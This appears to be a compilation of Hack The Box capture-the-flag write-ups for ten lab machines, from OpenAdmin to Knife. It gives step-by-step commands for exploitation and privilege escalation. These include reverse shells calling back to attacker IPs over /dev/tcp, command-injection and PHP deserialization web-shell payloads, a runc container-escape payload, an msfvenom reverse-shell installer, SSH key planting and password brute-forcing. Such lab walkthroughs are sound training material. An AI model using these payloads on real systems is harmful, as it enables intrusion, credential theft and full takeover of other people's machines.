Hack The Box solution: OpenAdmin ~ 10.10.10.171

Enumeration

Scan open ports with RustScan:

Use dirsearch:

python3 dirsearch.py -u http://10.10.10.171/

Access: http://10.10.10.171/ona/

We see that: “Your version = v18.1.1”

Search in Exploit Database, we have OpenNetAdmin 18.1.1 – Command Injection Exploit (Metasploit).

Foothold

Send POST request to the server with the data:

xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo+'begin';id;echo+'end';&xajaxargs[]=ping

And the command executed.

Stand a netcat listener in our machine:

nc -lvnp 1234

Call to our listener with:

xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo+'begin';bash+-c+'bash+-i+>%26+/dev/tcp/10.10.16.11/1234+0>%261';echo+'end';&xajaxargs[]=ping

There are 2 users:

We will get jimmy‘s password in /opt/ona/www/local/config/database_settings.inc.php

Spawn a TTY shell with:

python3 -c 'import pty;pty.spawn("/bin/bash");'

Change to jimmy:

su jimmy

Find jimmy‘s files with:

find / -type f -user jimmy 2>/dev/null | grep -v '/proc/'

We found 3 files:

Read main.php

index.php

So, we need to login as jimmy and we will have joanna‘s ssh private key.

Check local open ports with:

(netstat -punta || ss --ntpu)

So I think internal is hosted in port 52846.

And we can easily get the key with:

curl localhost:52846/main.php -H 'Session: username=jimmy'

Save the key to a file named id_rsa.

We will use JohntheRipper ssh2john.py to crack the private key.

python3 ssh2john.py id_rsa > hash

Next, we use JohntheRipper and rockyou.txt.

john-the-ripper -w=rockyou.txt hash

Then, we can connect to ssh:

chmod 600 id_rsa
ssh -i id_rsa joanna@10.10.10.171

And we have the key.

Privilege Escalation

Check what we can do with:

sudo -l

Follow steps in GTFOBins, we can easily get root.

sudo nano /opt/priv
^R^X
reset; sh 1>&0 2>&0

Hack The Box solution: Pit ~ 10.10.10.241

Enumeration

Scan open ports with RustScan:

rustscan -a 10.10.10.241 -- -sCV

Port 9090 is open, so we access: https://10.10.10.241:9090/

But we cannot login.

There is a host in the nmap output:

dms-pit.htb

Add the host to /etc/hosts

10.10.10.241	dms-pit.htb

But this web is forbidden.

Use UDP scan:

sudo nmap -sCVU 10.10.10.241

Port 161 is open with Simple Network Management Protocol (snmp) service.

We will use snmp tool for this machine.

./snmpbw.pl 10.10.10.241 public 2 1
cat 10.10.10.241.snmp

We found directories:

and usernames:

Access the directory we found:

http://dms-pit.htb/seeddms51x/seeddms

We can login using the username we found, the password is the same.

Search for SeedDMS in Exploit Database, we have SeedDMS versions < 5.1.11 – Remote Command Execution.

Go to our Docs -> Users -> Michelle:

Add document, we will upload ‘1.php‘ to the server.

Then, go to the file (change the document id):

http://dms-pit.htb/seeddms51x/data/1048576/32/1.php?cmd=cat+/etc/passwd

And the command executed.

Do a little enumerating, we found:

http://dms-pit.htb/seeddms51x/data/1048576/33/1.php?cmd=cat%20/var/www/html/seeddms51x/conf/settings.xml

View page source for a better view:

Foothold

Use the password with the username we found before, we can login to: https://pit.htb:9090/

Go to Terminal, we can get the flag:

Privilege Escalation

When using snmp tool, we found:

cat /usr/bin/monitor

We will create check.sh for /usr/bin/monitor to execute.

In our machine, run:

ssh-keygen

Create check.sh

#!/bin/bash
echo 'your-public-key' > /root/.ssh/authorized_keys

Host a http server:

python3 -m http.server 8080

In the michelle‘s terminal, we run:

curl http://10.10.16.4:8080/check.sh -o /usr/local/monitoring/check.sh

After uploading the file, in our machine, run:

sudo apt-get install snmp-mibs-downloader
snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects

And check.sh is executed, connect to ssh:

ssh -i id_rsa root@10.10.10.241

Hack The Box solution: TheNotebook ~ 10.10.10.230

Enumeration

Scan open ports with RustScan:

rustscan -a 10.10.10.230 -- -sCV

Access the web: http://10.10.10.230/

Register an account and login. View the Cookie:

This page use an JWT token, decode it with JSON Web Tokens – jwt.io.

There is a field named "admin_cap" with the false value.

The token use "kid", we can read more in Hacking JWT Tokens: kid Claim Misuse — Key Leak.

Foothold

Create a private rsa key in our machine:

openssl genrsa -out privKey.key 2048

Continue use JSON Web Tokens – jwt.io to encode a JWT token with our private key. Change the value of "admin_cap" to true and change "kid" to our file.

Then, host a http server:

python3 -m http.server

Paste the new token into the Cookie and reload the webpage.

Now, we have the admin page. Go to Admin Panel:

We can upload file, we will upload php-reverse-shell.php (change the IP) to the server.

Stand a netcat listener in our machine:

nc -lvnp 1234

And view the file:

We found a backup file in /var/backups

Host a http server in the target machine:

python3 -m http.server 1235

And get the file in our machine:

wget http://10.10.10.230:1235/home.tar.gz

We found a private key for ssh.

Then connect to ssh with:

ssh -i id_rsa noah@10.10.10.230

And we have the flag.

Privilege Escalation

Check what we can do with:

sudo -l

Check docker version:

docker --version

This machine is vulnerable to CVE-2019-5736, follow steps in Runc exploit (CVE-2019-5736).

Download file main.go, change the payload in the file into:

var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.47/1234 0>&1"

On our machine, run:

go build main.go

Host a http server in our machine:

python3 -m http.server

And in another terminal stand a netcat listener:

nc -lvnp 1234

In the target machine, run:

sudo docker exec -it webapp-dev01 bash
wget http://10.10.14.47:8000/main
chmod +x main
./main

Quickly execute in another ssh terminal:

sudo docker exec -it webapp-dev01 /bin/sh

And we have the flag.

Hack The Box solution: Explore ~ 10.10.10.247

Enumeration

Scan open ports with RustScan:

rustscan -a 10.10.10.247 -- -sCV

Service details:

Search in Exploit Database and we found ES File Explorer 4.1.9.7.4 – Arbitrary File Read.

Foothold

Use the exploit, we get a list of Pictures:

python3 50070.py listPics 10.10.10.247

There is a file named ‘creds.jpg‘. Get this file:

python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

And now we have a credential.

Connect to ssh:

ssh kristi@10.10.10.247 -p 2222

We will get the flag in /sdcard.

Privilege Escalation

Check listening ports with:

netstat -l

Port 5555 is open.

We will use SSH Tunneling for this machine.

ssh -L 5555:127.0.0.1:5555 -N -f kristi@10.10.10.247 -p 2222

Then use adb.

adb connect 127.0.0.1:5555
adb shell
su

And the flag is in /data

Hack The Box solution: Love ~ 10.10.10.239

Enumeration

Use nmap to find open ports:

nmap -sCV 10.10.10.239

Access the web:

http://10.10.10.239/

In nmap result, we found a host: staging.love.htb. Add this host to your /etc/hosts.

10.10.10.239    staging.love.htb

Access the web.

Select Demo:

http://staging.love.htb/beta.php

Port 5000 is open, but when we access:

http://10.10.10.239:5000/

So, I think about Server-side request forgery (SSRF), input this URL in Free File Scanner.

127.0.0.1:5000

And we have the admin credential.

Back to Voting System but we cannot login, so I go to:

http://10.10.10.239/admin/

And we can login here.

Foothold

In Voters List, we can upload file to the server.

We will upload php_reverse_shell.php to the server (after changing the IP).

Stand a netcat listener in our machine.

nc -nvlp 1234

And we found the flag.

Privilege Escalation

Check AlwaysInstallElevated:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Create our msi file with:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.9 LPORT=1235 -f msi -o reverse.msi

Upload file to the server like we uploaded reverse shell. The file will be saved in C:\xampp\htdocs\omrs\images

Stand a netcat listener in our machine.

nc -nvlp 1235

Aand execute msi file with:

msiexec /quiet /qn /i reverse.msi

Hack The Box solution: Tenet ~ 10.10.10.223

Enumeration

Use nmap to find open ports:

nmap -sCV 10.10.10.223

Add this to your /etc/hosts

10.10.10.223	tenet.htb

Read Migration and we found a comment.

Try http://tenet.htb/sator.php but we found nothing.

So I try: http://10.10.10.223/sator.php

And download the backup file:

http://10.10.10.223/sator.php.bak

Foothold

The vulnerability here is PHP object injection vulnerability, you can get more information in Exploiting PHP deserialization.

I will write a new php reverse shell in the server. We can generate the payload with:

<?php
class DatabaseExport
{
   public $user_file = 'users.php';
   public $data = '<?php system($_GET["cmd"])?>';
}
print urlencode(serialize(new DatabaseExport));
?>

Then we have:

O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A9%3A%22users.php%22%3Bs%3A4%3A%22data%22%3Bs%3A28%3A%22%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3F%3E%22%3B%7D

And send the payload to the server by accessing:

http://10.10.10.223/sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A9%3A%22users.php%22%3Bs%3A4%3A%22data%22%3Bs%3A28%3A%22%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3F%3E%22%3B%7D

Stand a netcat listener in our machine:

nc -lvnp 1234

And call to our listener with:

http://10.10.10.223/users.php?cmd=/bin/bash%20-c%20%22bash%20-i%20%3E&%20/dev/tcp/10.6.63.158/1234%200%3E&1%22

The payload we use is:

/bin/bash -c "bash -i >& /dev/tcp/10.6.63.158/1234 0>&1"

Read file /var/www/html/wordpress/wp-config.php and we will have neil’s password.

Try to use this password to connect to SSH.

ssh neil@10.10.10.223

Privilege Escalation

Check what we can do with:

sudo -l

Read this file:

cat /usr/local/bin/enableSSH.sh

The script will write ssh public key to a file in /tmp and then write it to /root/.ssh/authorized_keys

We need to use Race Condition to write our public key to file in /tmp before it is written in /root.

In our machine use:

ssh-keygen

Our public key is saved in id_rsa.pub, we will write this key to /tmp with:

while true; do echo 'your-public-key' | tee /tmp/ssh-* > /dev/null; done

In another terminal, we run:

touch output.txt
while ! grep "creating" output.txt; do sudo /usr/local/bin/enableSSH.sh > output.txt; done

And when the second terminal stop, we can ssh to root.

ssh -i id_rsa root@10.10.10.223

Hack The Box solution: Cap

Enumeration

Access website: http://10.129.121.201/

Select Security Snapshot (5 Second PCAP + Analysis), we access a link:

http://10.129.121.201/data/1

We can download a pcap file here but there is nothing, so I go to:

http://10.129.121.201/data/0

Download the pcap file and open it with wireshark. Follow TCP Stream, we found the user and password in Stream 3.

Foothold

This is a FTP credential but we can login to ssh with this credential.

ssh nathan@10.129.121.201

Privilege Escalation

We will use getcap to examine file capabilities.

getcap -r / 2>/dev/null

/usr/bin/python3.8 have cap_setuid

We will get root’s shell with:

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

And we found root‘s flag.

Hack The Box solution: Spectra ~ 10.10.10.229

Enumeration

Use nmap to find open ports:

nmap -sCV 10.10.10.229

Access the web: http://10.10.10.229/

Click Software Issue Tracker, you may need to add this to your /etc/hosts.

10.10.10.229	spectra.htb

http://spectra.htb/main/

Click Test, and go to http://spectra.htb/testing/

Go to wp-config.php.save and view page source, we can see a MySQL credential.

Login to WordPress with username “administrator” and the password we found.

And we can login.

Foothold

We will use Metasploit for this machine.

use exploit/unix/webapp/wp_admin_shell_upload

Set PASSWORD, RHOSTS, TARGETURI, USERNAME, LHOST and exploit the machine.

Privilege Escalation

Find SUID files with:

find / -type f -perm -u=s 2>/dev/null

And we can easily get root with:

/bin/bash -p

User’s flag is in /home/katie

And root‘s flag is in /root

Hack The Box solution: Armageddon ~ 10.10.10.233

Enumeration

Use nmap:

nmap -sCV 10.10.10.233

Access the web page:

This web is using Drupal 7.

Foothold

We will use metasploit to exploit this machine.

use exploit/unix/webapp/drupal_drupalgeddon2

Set RHOSTS and LHOST, then exploit.

Find the name of the user:

cat /etc/passwd

We can use hydra with rockyou.txt to brute force the ssh password.

hydra -l brucetherealadmin -P rockyou.txt 10.10.10.233 ssh

And connect to ssh.

ssh brucetherealadmin@10.10.10.233

We have the flag.

Privilege Escalation

See what we can do with:

sudo -l

So we can run snap install as root, follow steps in GTFOBins.

You may need to install fpm.

In our machine run:

COMMAND='cat /root/root.txt'
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta

Then, host a http server in our machine:

python3 -m http.server

In the server, run:

curl http://10.10.16.13:8000/xxxx_1.0_all.snap -o xxxx_1.0_all.snap

And get the flag with:

sudo snap install xxxx_1.0_all.snap --dangerous --devmode

Hack The Box solution: Knife ~ 10.10.10.242

Enumeration

Use nmap:

nmap -sCV 10.10.10.242

Access the webpage.

And view the response, we have.

This web is using PHP/8.1.0-dev, this PHP version has a backdoor. We can get more detail in php-8.1.0-dev-backdoor-rce.

Try to inject a Header User-Agentt with the command and we have it executed.

User-Agentt: zerodiumsystem('id');

Foothold

We will connect to the server via ssh, use:

ssh-keygen

Our public key is saved in id_rsa.pub, we will write this key to /home/james/.ssh/authorized_keys with:

echo "public_key" > /home/james/.ssh/authorized_keys

And we connect to ssh with:

ssh james@10.10.10.242 -i id_rsa

And we have user’s flag.

Privilege Escalation

See what we can do with:

sudo -l

So we can run knife as root, we will use knife exec to run system command as root.

sudo knife exec -E 'system("id")'

sudo knife exec -E 'system("cat /root/root.txt")'